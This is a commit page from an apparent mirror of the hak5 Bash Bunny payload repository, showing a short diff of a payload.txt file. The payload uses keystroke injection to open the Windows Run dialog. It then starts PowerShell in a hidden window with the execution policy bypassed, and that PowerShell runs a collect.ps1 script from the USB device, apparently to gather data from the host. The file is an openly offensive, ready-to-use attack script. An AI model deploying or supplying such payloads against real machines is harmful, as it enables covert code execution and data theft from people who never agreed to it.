mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-19 19:48:25 +00:00
Modify PowerShell command in payload.txt
Updated PowerShell command to reflect device name changes.
This commit is contained in:
@@ -9,6 +9,6 @@ LED ATTACK
|
||||
# Open Run dialog
|
||||
QUACK GUI r
|
||||
sleep 0.3
|
||||
# Launch PowerShell hidden and run the script
|
||||
# Below is the line you will need to change if you have altered your Device Name or if it is something other than BashBunny
|
||||
RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\collect.ps1')"
|
||||
LED FINISH
|
||||
|
||||
Reference in New Issue
Block a user